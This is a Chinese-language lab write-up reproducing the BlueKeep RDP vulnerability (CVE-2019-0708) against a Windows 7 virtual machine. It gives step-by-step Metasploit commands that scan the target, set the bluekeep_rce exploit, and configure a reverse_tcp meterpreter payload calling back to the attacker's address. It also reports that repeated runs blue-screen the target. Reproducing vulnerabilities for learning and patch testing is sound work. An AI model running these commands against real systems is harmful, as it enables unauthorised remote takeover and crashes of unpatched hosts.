漏洞概述
遠程桌面服務高危遠程代碼執行漏洞(CVE-2019-0708),老是有系統爆這個漏洞,但是很少能有利用的,今天搭環境來測試以下利用條件。
涉及系統版本
Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)
不涉及系統版本
windows 10
windows 8
漏洞復測
攻擊機:kali2021 IP: 192.168.2.103
靶機:windows7 IP:192.168.2.109

1、搜索msf支持的0708模塊
search 0708

2、利用掃描模塊探測目標系統是否存在漏洞
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
use rhosts 192.168.2.109 //設置目標
run

表示目標存在0708漏洞
3、設置攻擊模塊參數
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //設置攻擊模塊
show options
set rhosts 192.168.2.109 //設置目標
set lhost 192.168.2.103 //設置shell監聽IP,監聽端口默認即可
set payload windows/x64/meterpreter/reverse_tcp //設置payload

4、設置攻擊模式,最終攻擊設置如下圖
show optinos targets //查看攻擊模塊支持的系統
set target 1 //設置攻擊模塊模式1
show options

5、執行攻擊獲取meterpreter,看起來一切順利
run

6、多運行幾次payload,發現計算機藍屏

聲明
嚴禁讀者利用以上介紹知識點對網站進行非法操作 , 本文僅用於技術交流和學習 , 如果您利用文章中介紹的知識對他人造成損失 , 后果由您自行承擔 , 如果您不能同意該約定 , 請您務必不要閱讀該文章 , 感謝您的配合!
